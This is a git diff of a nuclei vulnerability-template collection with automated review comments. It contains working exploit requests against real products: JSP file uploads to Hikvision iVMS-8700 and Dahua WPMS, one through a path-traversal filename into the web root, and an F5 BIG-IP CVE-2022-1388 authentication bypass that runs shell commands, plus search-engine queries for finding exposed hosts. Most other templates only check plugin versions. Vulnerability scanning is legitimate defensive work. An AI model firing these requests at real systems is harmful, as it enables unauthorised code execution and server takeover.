/svm/api/external/report HTTP/1.1 + POST /center/api/files;.html HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -24,17 +25,11 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' + - 'contains(body_1, "test.jsp")' condition: and 
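Review bot: In the second hunk, with the verification GET removed, the matcher `contains(body_1, "test.jsp")` only checks that the upload response echoes the filename, so a target that rejects the file but reflects its name in an error is reported as vulnerable; results need manual confirmation and the `description:` should state that a hit means the endpoint accepted the request, not that a file was confirmed written. The POST (context above the hunk) still sends `<%out.print("test");%>` as a JSP, so the template writes a file on the target and needs a `tags:` line including `intrusive` — the file currently has no `tags:` at all. `id: HiKVISION` is also shared, up to case, with `id: HIKVISION` in Hikvision_iVMS-8700_upload_action.yaml below; template ids should be unique and descriptive, e.g. `id: hikvision-ivms-8700-files-upload`.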
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index fa3aafbfe2..c7afb0444b 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml 
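Review bot: The new `name:` and `author:` lines introduce typos, `HHIKVISION iVMS-8700 upload Webshell file` and `zerZero Trust Security Attack and Defense Laboratory`, and the description now reads `Platfor`; the intended values are presumably `HIKVISION iVMS-8700 upload Webshell file`, `Zero Trust Security Attack and Defense Laboratory` and `Platform`. The added `Content-Length: 184` is a fixed value while the multipart body carries `{{randstr}}`, whose length is not fixed, so if the header is sent as written it will not match the body; nuclei presumably recomputes it for raw requests, but dropping the line is safer than hardcoding it, and the same applies to `Content-Length: 177` in dahua-wpms-addimgico-fileupload.yaml in this commit. The upload still uses a fixed `filename="test.jsp"` and leaves the file on the server, which an `intrusive` tag under `info` would make explicit.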
@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file diff --git a/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml b/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml new file mode 100644 index 0000000000..4ae016b306 --- /dev/null +++ b/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml 
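Review bot: `max-request: 1` in the new metadata is wrong for this template, which sends two raw requests (the POST to `/emap/devicePoint_addImgIco` and the GET to `/upload/emap/society_new/{{name}}`); it should read `max-request: 2`. The id is still `CVE-2023-3836` while the whole `classification` block (cve-id, CVSS, CWE) was removed and the name and description were replaced with Chinese text, so the template now carries a CVE id with no CVE metadata; either restore `cve-id: CVE-2023-3836` under `classification` or change the id. The old `tags` line with `intrusive` was removed without replacement even though the template still writes `test.jsp` to the server, so a tags line including `intrusive` should be kept.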
@@ -0,0 +1,59 @@ +id: white-label-cms-666f157d61e42bbd8a6cd2cf31809b57 + +info: + name: > + White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/white-label-cms/" + google-query: inurl:"/wp-content/plugins/white-label-cms/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,white-label-cms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "white-label-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml 
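Review bot: The new template leaves `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` empty and sets `shodan-query: 'vuln:'` to a placeholder, while `tags` starts with `cve` although no CVE id is given; either fill these from the referenced Wordfence entry or remove the empty keys and the `cve` tag. The same applies to the bitformpro, busiprof, clearfy, clover-online-orders, contest-gallery, display-a-meta-field-as-block, e2pdf, embedpress and formfacade templates added in this commit. The two `version` extractors differ only in `internal: true`; presumably one named extractor already serves both the DSL matcher and the output, in which case the duplicate can go. The check is `compare_versions(version, '<= 2.7.4')` against the readme's `Stable tag`, which detects an installed version range rather than the XSS itself, so the name or description should say the match is version-based.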
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml index 62a06938bc..824800fadb 100644 --- a/poc/other/bigip.yaml +++ b/poc/other/bigip.yaml 
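Review bot: The file is named `Hikvision_Env_Information_Leakage.yaml` but its new content is the report-interface arbitrary file upload template (blob `e86e8491d1`, which `Hikvision_iVMS-8700_Fileupload_Files.yaml` held before this commit), so the filename no longer describes what it does and the env information-leak check it used to hold is gone rather than moved. The `id: HiKVISION` value is also shared with `Hikvision_iVMS-8700_Fileupload_Files.yaml` in the same commit, and template ids are expected to be unique, so a distinct id (for example `hikvision-report-file-upload`, a constructed suggestion) should be used. The template writes `test.jsp` through a traversal path into the web root with no `intrusive` tag and no cleanup, which should at least be stated in the description.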
@@ -1,29 +1,30 @@ id: CVE-2022-1388 + info: - name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter - author: Mrcl0wn + name: F5 BIG-IP iControl - REST Auth Bypass RCE + author: dwisiswant0,Ph33r severity: critical - description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" + description: | + F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. 
reference: - - https://github.com/alt3kx/CVE-2022-1388_PoC + - https://twitter.com/GossiTheDog/status/1523566937414193153 + - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ - https://support.f5.com/csp/article/K23605346 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md - - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py - - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip - - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 metadata: shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - verified: true - tags: bigip,mirai,rce,cve,cve2022 + verified: "true" + tags: f5,bigip,cve,cve2022,rce,mirai,kev + variables: - auth_var: "admin:" - cmd_var: "{{CMD}}" + auth: "admin:" + cmd: "echo CVE-2022-1388 | rev" + requests: - raw: - | 
@@ -31,27 +32,35 @@ requests: Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a - Authorization: Basic {{base64(auth_var)}} + Authorization: Basic {{base64(auth)}} Content-Type: application/json { - "command": "run", - "utilCmdArgs": "-c 'id;cmd_var'" + "command": "run", + "utilCmdArgs": "-c '{{cmd}}'" } - extractors: - - type: regex - part: body - name: result_command - group: 1 - regex: - - "\"commandResult\":\"(.*)\"" + + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: localhost + Connection: keep-alive, X-F5-Auth-Token + X-F5-Auth-Token: a + Authorization: Basic {{base64(auth)}} + Content-Type: application/json + + { + "command": "run", + "utilCmdArgs": "-c '{{cmd}}'" + } + + stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - "commandResult" - - "uid=" - - "{{cmd_var}}" - - type: status - status: - - 200 + - "8831-2202-EVC" condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml b/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml new file mode 100644 index 0000000000..8cd2b5e8cb --- /dev/null +++ b/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml 
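Review bot: `verified: "true"` in the first hunk's new metadata is a quoted string where the other templates in this commit (the dahua template, for one) use the bare boolean `verified: true`; tooling that reads the field as a boolean will treat the string differently, so the quotes should go. The file keeps the top-level `requests:` key while every other template in this diff uses `http:`; renaming it keeps the set consistent. In the second hunk, `matchers-condition: and` is redundant with a single matcher, and the second request is not explained, so a short comment such as `# same request repeated with Host: localhost` above it would help the reader. The request whose headers open the second hunk begins before the hunk.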
@@ -0,0 +1,59 @@ +id: bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml b/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml new file mode 100644 index 0000000000..b217c832cf --- /dev/null +++ b/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml 
@@ -0,0 +1,59 @@ +id: bitformpro-c1951a840a2ea27fbc40d83eac2e0432 + +info: + name: > + Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml b/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml new file mode 100644 index 0000000000..7cd4c5fefa --- /dev/null +++ b/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml 
@@ -0,0 +1,59 @@ +id: bitformpro-d139e243b64b91b847d04cde6b5cce90 + +info: + name: > + Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml b/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml new file mode 100644 index 0000000000..683c343e1d --- /dev/null +++ b/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml 
@@ -0,0 +1,59 @@ +id: bitformpro-d755f86f5f98181fb2d499fd64b215af + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml b/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml new file mode 100644 index 0000000000..79d6741989 --- /dev/null +++ b/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml 
@@ -0,0 +1,59 @@ +id: busiprof-ad5d3d293e421d6fd904811f4fd425fa + +info: + name: > + Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/busiprof/" + google-query: inurl:"/wp-content/themes/busiprof/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,busiprof,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/busiprof/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "busiprof" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.8') \ No newline at end of file diff --git a/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml b/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml new file mode 100644 index 0000000000..500940164f --- /dev/null +++ b/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml 
@@ -0,0 +1,59 @@ +id: clearfy-2ca2a060d0fe3d1049a304a11c885f52 + +info: + name: > + Clearfy Cache <= 2.2.3 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/clearfy/" + google-query: inurl:"/wp-content/plugins/clearfy/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,clearfy,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clearfy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml b/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml new file mode 100644 index 0000000000..f05a439150 --- /dev/null +++ b/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml 
@@ -0,0 +1,59 @@ +id: clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml b/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml new file mode 100644 index 0000000000..b2354500ed --- /dev/null +++ b/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml 
@@ -0,0 +1,59 @@ +id: clover-online-orders-d77a8bf96347576e414fb350aeaf95b7 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml b/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml new file mode 100644 index 0000000000..ed9cb01472 --- /dev/null +++ b/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml 
